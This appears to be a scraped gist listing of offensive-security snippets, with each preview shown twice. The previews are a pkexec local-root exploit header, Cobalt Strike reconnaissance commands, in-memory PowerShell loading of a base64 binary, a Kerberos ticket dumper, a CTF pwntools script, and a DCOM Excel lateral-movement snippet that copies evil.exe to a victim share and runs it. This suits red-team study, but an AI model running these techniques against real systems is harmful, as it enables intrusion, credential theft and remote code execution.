Topher Timzen tophertimzen

## pkexec.c
/*
 * For original see haxx.in/files/blasty-vs-pkexec.c
 *
 * this version is just using some awful hack to
 * avoid having to call gcc on the target box.
 * this versions fragile - must be named payload.so
 * might add better detection later, whatever.
 * all credit to bl4sty for the actual exploit,
 * I just made some changes for my usecase.
 * you will have to change the interp for diff

## cobaltstrike_sa.txt
Windows version:
	reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion

Users who have authed to the system:
	ls C:\Users\

System env variables:
	reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment

Saved outbound RDP connections:

## UEFISecDatabaseParser.ps1
function Get-UEFIDatabaseSigner {
<#
.SYNOPSIS

Dumps signature or hash information for whitelisted ('db' variable) or blacklisted ('dbx' variable) UEFI bootloaders.

.DESCRIPTION

Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause

## LoadInMemoryModule.ps1
$Domain = [AppDomain]::CurrentDomain
$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into.
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
$TypeBuilder.CreateType()
$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA

## spectre.c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

## dmesg_rick.c
#include <linux/hrtimer.h>
#include <linux/module.h>
#include <linux/kernel.h>

static struct hrtimer timer;

enum hrtimer_restart yell_rick( struct hrtimer *timer )
{
        ktime_t time;
        printk(KERN_INFO "I turned myself into a logger morty! I'm dmesg RIIIICK!\n");

## Get-KerberosTicketGrantingTicket.ps1
function Get-KerberosTicketGrantingTicket
{
    <#
    .SYNOPSIS

    Gets the Kerberos Tickets Granting Tickets from all Logon Sessions

    .DESCRIPTION

    Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets.

## foxprow.ps1
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111"))
# Windows 10 specific, but searches PATH so ..
copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
$excel.ActivateMicrosoftApp("5")
# excel executes your binary :)

## pwnmegan35.py
#!/usr/bin/env python2
import base64
from pwn import *

HOST='megan35.stillhackinganyway.nl'
PORT='3535'

REMOTE=True
DEBUG=False
FNAME='./megan-35'

## lookupadmins.py
#!/usr/bin/env python
#
# Title: lookupadmins.py
# Author: @ropnop
# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
# Similar in function to Get-NetLocalGroup from Powerview
# Won't work against Windows 10 Anniversary Edition unless you already have local admin
# See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016
#
# Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket
	/*
	* For original see haxx.in/files/blasty-vs-pkexec.c
	*
	* this version is just using some awful hack to
	* avoid having to call gcc on the target box.
	* this versions fragile - must be named payload.so
	* might add better detection later, whatever.
	* all credit to bl4sty for the actual exploit,
	* I just made some changes for my usecase.
	* you will have to change the interp for diff
	Windows version:
	reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion

	Users who have authed to the system:
	ls C:\Users\

	System env variables:
	reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment

	Saved outbound RDP connections:
	function Get-UEFIDatabaseSigner {
	<#
	.SYNOPSIS

	Dumps signature or hash information for whitelisted ('db' variable) or blacklisted ('dbx' variable) UEFI bootloaders.

	.DESCRIPTION

	Author: Matthew Graeber (@mattifestation)
	License: BSD 3-Clause
	$Domain = [AppDomain]::CurrentDomain
	$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
	$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
	$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
	# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into.
	$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
	$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
	$TypeBuilder.CreateType()
	$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA
	#include <stdio.h>
	#include <stdlib.h>
	#include <stdint.h>
	#ifdef _MSC_VER
	#include <intrin.h> /* for rdtscp and clflush */
	#pragma optimize("gt",on)
	#else
	#include <x86intrin.h> /* for rdtscp and clflush */
	#endif
	#include <linux/hrtimer.h>
	#include <linux/module.h>
	#include <linux/kernel.h>

	static struct hrtimer timer;

	enum hrtimer_restart yell_rick( struct hrtimer *timer )
	{
	ktime_t time;
	printk(KERN_INFO "I turned myself into a logger morty! I'm dmesg RIIIICK!\n");
	function Get-KerberosTicketGrantingTicket
	{
	<#
	.SYNOPSIS

	Gets the Kerberos Tickets Granting Tickets from all Logon Sessions

	.DESCRIPTION

	Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets.
	$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111"))
	# Windows 10 specific, but searches PATH so ..
	copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
	$excel.ActivateMicrosoftApp("5")
	# excel executes your binary :)
	#!/usr/bin/env python2
	import base64
	from pwn import *

	HOST='megan35.stillhackinganyway.nl'
	PORT='3535'

	REMOTE=True
	DEBUG=False
	FNAME='./megan-35'
	#!/usr/bin/env python
	#
	# Title: lookupadmins.py
	# Author: @ropnop
	# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
	# Similar in function to Get-NetLocalGroup from Powerview
	# Won't work against Windows 10 Anniversary Edition unless you already have local admin
	# See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016
	#
	# Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket